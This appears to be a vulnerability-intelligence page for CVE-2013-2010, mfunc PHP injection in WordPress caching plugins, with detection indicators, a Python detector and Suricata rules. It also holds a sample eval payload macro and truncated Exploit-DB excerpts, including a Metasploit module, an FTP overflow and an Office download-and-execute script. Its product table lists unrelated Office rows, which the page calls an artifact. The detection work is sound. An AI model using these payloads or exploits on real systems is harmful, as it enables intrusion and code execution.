CVE-2013-2010
Published: 2020-02-12
CVE-2013-2010: WordPress W3 Total Cache Plugin 0.9.2.8 has a Remote PHP Code Execution Vulnerability
Priority: P2 (78) · Severity: critical · CVSS 3.1 base score: 9.8
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available (see the Exploit-DB and Metasploit entries below)
EPSS: 73.86% (99.4th percentile)
Affected (15 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| automattic | wp_super_cache | <= 1.2 | — |
| boldgrid | w3_total_cache | <= 0.9.2.8 | — |
| msrc | microsoft_365_apps_for_enterprise_for_32-bit_systems | — | — |
| msrc | microsoft_365_apps_for_enterprise_for_64-bit_systems | — | — |
| msrc | microsoft_excel_2010_service_pack_2 | — | — |
| msrc | microsoft_excel_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_excel_2013_service_pack_1 | — | — |
| msrc | microsoft_excel_2016 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
| msrc | microsoft_office_2019_for_32-bit_editions | — | — |
| msrc | microsoft_office_2019_for_64-bit_editions | — | — |
| w3_total_cache_plugin_authors | w3_total_cache_plugin | — | — |

Note: the CVE record describes only the two WordPress caching plugins (W3 Total Cache up to 0.9.2.8 and WP Super Cache up to 1.2). The Microsoft Office rows above, and the vendor MSRC score in the CVSS provenance section, are not supported by the CVE description and look like an aggregation artifact; treat only the two plugin rows as authoritative when scoping exposure.
Detection & IOCs (extracted from sources)
- Detect exploitation attempts by monitoring POST requests to wp-comments-post.php whose comment body contains an mfunc macro (`<!--mfunc ... --><!--/mfunc-->`); this is the injection vector for arbitrary PHP code execution. Decode the form body (percent-encoding and `+`) before matching, because the markup arrives URL-encoded.
- Flag HTTP responses carrying an X-Powered-By header of the form `W3 Total Cache/<version>` with a version of 0.9.2.8 or lower as vulnerable targets. This is a passive version check; compare the version numerically, not as a string.
- Detect the exploit's payload delivery phase by looking for HTTP requests to the cached post URI carrying the custom headers `Cmd` (base64-encoded) and `Sum`, which the Metasploit module uses to trigger and verify code execution. Other tooling can rename these headers, so treat them as an indicator of this specific module rather than of the vulnerability class.
- Monitor for HTTP responses containing the string 'Performance optimized by W3 Total Cache' or 'Cached page generated by WP-Super-Cache' as indicators that a potentially vulnerable plugin is active. The marker identifies the plugin, not its version.
- Detect anonymous comment-spam exploitation by monitoring POST requests to wp-comments-post.php that include randomly generated author, email and URL fields alongside a comment containing PHP macro syntax (mfunc).
- A session cookie matching 'logged_in' in the Set-Cookie headers following a POST to wp-login.php indicates the authenticated exploitation path only when the same session then posts a comment containing the macro; on its own it is just a normal login and should not be alerted on.
- Exploitation requires that the WordPress 'A comment is held for moderation' option is disabled; if moderation is enabled, the injected comment is never rendered into the page and therefore does not execute.
- A valid post ID is required for exploitation. The module brute-forces one if POSTID is not specified, so detection systems may observe sequential GET requests probing post IDs before the comment is posted.
- If anonymous comments are disabled on the WordPress installation, the attacker must supply valid credentials (USERNAME/PASSWORD), shifting the attack to the authenticated exploitation path.
- WP Super Cache 1.2 or older is also reported as vulnerable to the same mfunc macro injection, so detection rules should cover both plugins.
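As an added example (not code from the page, the Metasploit module, or either plugin), the following Python folds the checks in the list above into one classifier that runs over parsed HTTP records. The record layout, the label names, and every sample request are constructed for illustration; the only indicators taken from the list are the wp-comments-post.php endpoint, the mfunc marker, the `Cmd`/`Sum` headers, the X-Powered-By banner, the two HTML markers and the logged-in cookie.

```python
"""Added example (not code from the page or from the W3 Total Cache project):
flags the CVE-2013-2010 indicators listed above in parsed HTTP traffic.
The record layout and every sample request below are constructed."""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Last vulnerable W3 Total Cache release named on the page.
W3TC_LAST_VULNERABLE = (0, 9, 2, 8)
W3TC_BANNER_RE = re.compile(r"W3 Total Cache/([\d.]+)")
# Injection vector: an mfunc macro in the comment body.  The opening marker
# is the stable part of the syntax, so that is what we match.
MFUNC_RE = re.compile(r"<!--\s*mfunc\b", re.IGNORECASE)
PLUGIN_MARKERS = ("Performance optimized by W3 Total Cache",
                  "Cached page generated by WP-Super-Cache")


def parse_version(text):
    """'0.9.2.8' -> (0, 9, 2, 8)."""
    return tuple(int(p) for p in re.findall(r"\d+", text))


def vulnerable_w3tc(x_powered_by):
    """True if an X-Powered-By banner advertises W3 Total Cache <= 0.9.2.8.
    Compares numerically and pads short versions, so 0.9.2 < 0.9.2.8 < 0.9.3."""
    m = W3TC_BANNER_RE.search(x_powered_by or "")
    if not m:
        return False
    ver = parse_version(m.group(1))
    width = max(len(ver), len(W3TC_LAST_VULNERABLE))
    pad = lambda t: t + (0,) * (width - len(t))
    return pad(ver) <= pad(W3TC_LAST_VULNERABLE)


def is_base64(value):
    """Strict base64 check for the Cmd header used in the payload phase."""
    try:
        base64.b64decode(value, validate=True)
        return bool(value)
    except (binascii.Error, ValueError):
        return False


def classify(rec):
    """Return detection labels for one request/response record."""
    hits = []
    hdrs = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    path = rec["uri"].split("?", 1)[0]
    # 1. Injection: comment POST whose decoded form body carries the macro.
    if rec["method"] == "POST" and path.endswith("/wp-comments-post.php"):
        comment = " ".join(parse_qs(rec.get("body", "")).get("comment", []))
        if MFUNC_RE.search(comment):
            # A logged-in cookie on the injecting request itself is the
            # authenticated path; a login on its own is not an indicator.
            authed = "wordpress_logged_in" in hdrs.get("cookie", "")
            hits.append("mfunc-injection" + ("-authenticated" if authed else ""))
    # 2. Trigger: request to the cached page with Cmd (base64) and Sum headers.
    if rec["method"] == "GET" and "sum" in hdrs and is_base64(hdrs.get("cmd", "")):
        hits.append("payload-trigger")
    # 3. Passive fingerprints from the response: version banner and HTML marker.
    resp = rec.get("response", {})
    rhdrs = {k.lower(): v for k, v in resp.get("headers", {}).items()}
    if vulnerable_w3tc(rhdrs.get("x-powered-by")):
        hits.append("vulnerable-banner")
    if any(marker in resp.get("body", "") for marker in PLUGIN_MARKERS):
        hits.append("cache-plugin-active")
    return hits


def scan(records):
    """(index, labels) for every record that triggered at least one check."""
    return [(i, classify(r)) for i, r in enumerate(records) if classify(r)]


def _comment_body(comment):
    # Constructed form body in the shape wp-comments-post.php receives.
    return urlencode({"author": "qzkd", "email": "qzkd@example.com",
                      "url": "http://example.com/", "comment_post_ID": "1",
                      "comment": comment})


MACRO = "<!--mfunc eval(base64_decode($_SERVER[HTTP_CMD])); --><!--/mfunc-->"
SAMPLE_TRAFFIC = [  # constructed, not captured
    {"method": "POST", "uri": "/wp-comments-post.php", "headers": {},
     "body": _comment_body(MACRO)},
    {"method": "POST", "uri": "/wp-comments-post.php", "headers": {},
     "body": _comment_body("Nice write-up <!-- thanks -->")},
    {"method": "GET", "uri": "/?p=1",
     "headers": {"Cmd": base64.b64encode(b"id").decode(), "Sum": "c0ffee"},
     "response": {"headers": {"X-Powered-By": "W3 Total Cache/0.9.2.8"},
                  "body": "<html>...<!-- Performance optimized by W3 Total Cache -->"}},
    {"method": "GET", "uri": "/", "headers": {},
     "response": {"headers": {"X-Powered-By": "W3 Total Cache/0.9.3"}, "body": "<html>"}},
    {"method": "POST", "uri": "/wp-comments-post.php",
     "headers": {"Cookie": "wordpress_logged_in_1a2b=admin%7C1700000000%7Cabcd"},
     "body": _comment_body(MACRO)},
]

if __name__ == "__main__":
    for index, labels in scan(SAMPLE_TRAFFIC):
        print(index, labels)
```

Run it directly to see which samples fire. The version comparison is numeric, so a banner such as 0.9.2 is still flagged while 0.9.3 is not, and the logged-in cookie only contributes a label when it rides on the injecting comment POST itself rather than on the login that produced it.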
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor (MSRC) | — | 7.8 | HIGH | — |
Suricata · ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic · 2013-05-29 · references CVE-2010-3333 (a different CVE, listed as related; this rule does not detect CVE-2013-2010)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic"; flow:established,to_server; http.uri; content:"/search?hl="; content:"q="; content:"meta="; fast_pattern; pcre:"/meta=(?:(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4}))?(?:&?id=[a-z]+)?$/"; http.host; content:!"sogou.com"; http.user_agent; content:"Windows NT 5."; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"|0d 0a|accept"; reference:url,contagiodump.blogspot.no/2011/01/jan-6-cve-2010-3333-with-info-theft.html; classtype:trojan-activity; sid:2016932; rev:8; metadata:attack_target Client_Endpoint, created_at 2013_05_29, deployment Perimeter, malware_family H
Suricata · ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request · 2013-01-15 · references CVE-2010-0188 (a different CVE, listed as related; this rule does not detect CVE-2013-2010)
Rule: alert http1 $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request"; flow:established,to_server; urilen:8; http.uri; pcre:"/\x2F[0-9]{3}\.pdf$/"; http.request_line; content:".pdf HTTP/1."; fast_pattern; reference:url,blogs.mcafee.com/mcafee-labs/red-kit-an-emerging-exploit-pack; reference:cve,2010-0188; classtype:exploit-kit; sid:2016210; rev:4; metadata:created_at 2013_01_15, cve CVE_2010_0188, performance_impact Moderate, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_07;)
Exploit-DB · CVE-2017-0199 · 2017-09-30 · Microsoft Excel - OLE Arbitrary Code Execution
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it's possible to exploit it through Excel too, however the target would ne
Exploit-DB · CVE-2016-3313 [HIGH, CVSS 7.8] · 2016-08-10 · Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)
---
#####################################################################################
# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2007,2010,2013,2016
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @SebMorin1, @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3313
# COSIG-2016-31
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
1) Introduction
Microsoft Word is a word processor developed by Microsoft. It was first re
Exploit-DB · CVE-2015-6132 · 2015-12-14 · Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=556
It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has a InProcServer32 pointing to comsvcs.dll. Specifically the CQueueAdmin object implemented in the dll.
When a user op
Exploit-DB · CVE-2015-2510 · 2015-09-16 · Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GD
Exploit-DB · CVE-2013-7091 · 2013-12-06 · Zimbra 2009-2013 - Local File Inclusion
---
# Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30085.zip (zimbraexploit_rubina119.zip)
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials which allo
Exploit-DB · CVE-2013-4730 · 2013-06-30 · PCMan FTP Server 2.0 - Remote Buffer Overflow
---
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
USER = "anonymous"
PASSWD = "TEST"
PAYLOAD = "\x41" * 2010
EIP = "\xDB\xFC\x1
Exploit-DB · CVE-2013-2010 · 2013-05-01 · WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress W3 Total Cache PHP Code Execution',
      'Description'    => %q{
          This module exploits a PHP Code Injection vulnerability against Wordpress plugin
          W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older
          is also reported as vulnerable. The vulnerability is due to the handling of certain
          macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is
          needed in order to add the malicious comment. If th
Exploit-DB · CVE-2013-5657 · 2013-04-16 · Pwstore - Denial of Service
---
source: https://www.securityfocus.com/bid/62112/info
pwStore is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the application, denying service to legitimate users.
pwStore 2010.8.30.0 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
from sulley import *
import sys
import time
s_initialize("HTTP")
s_static("GET / HTTP/1.1\r\n")
s_static("Host")
s_static(":\x0d\x0a")
s_static(" ")
s_string("192.168.1.39")
s_static("\r\n")
s_static("\r\n")
print "Instantiating session"
sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50)
print "Instantiating target"
target = sessions.target("192.168.1.39", 443)
#target.procmon = pedrpc.client("127.0.0.1"
Exploit-DB · CVE-2010-3333 · 2013-02-20 · Microsoft Office 2010 - Download Execute
---
#!/usr/bin/python
# Exploit Title: MS Office 2010 Download Execute
# Google Dork: NA
# Date: 19 Feb 2013
# Exploit Author: g11tch
# Vendor Homepage:
# Software Link:
# Version: ALL
# Tested on: [Windows XP SP1, SP2, Windows 7 ]
# CVE :
##########
#Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe
import binascii
import sys
import time
print "Microsoft Office 2010, download -N- execute "
print " What do you want to name your .doc ? "
print " Example: TotallyTrusted.doc "
filename = raw_input()
print " What is the link to your .exe ? "
print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe "
url = raw_input()
print "Gears and Cranks working mag1c in th
Metasploit · WordPress W3 Total Cache PHP Code Execution
This module exploits a PHP Code Injection vulnerability against WordPress plugin W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older is also reported as vulnerable. The vulnerability is due to the handling of certain macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is needed in order to add the malicious comment. If the POSTID option isn't specified, then the module will automatically find or bruteforce one. Also, if anonymous comments aren't allowed, then a valid username and password must be provided. In addition, the "A comment is held for moderation" option on WordPress must be unchecked for successful exploitation. This module has been tested against WordPress 3.5 and W3 Total
References:
- http://packetstormsecurity.com/files/130999/WordPress-W3-Total-Cache-PHP-Code-Execution.html
- http://www.exploit-db.com/exploits/25137
- http://www.openwall.com/lists/oss-security/2013/04/24/9
- http://www.securityfocus.com/bid/59316
Published: 2020-02-12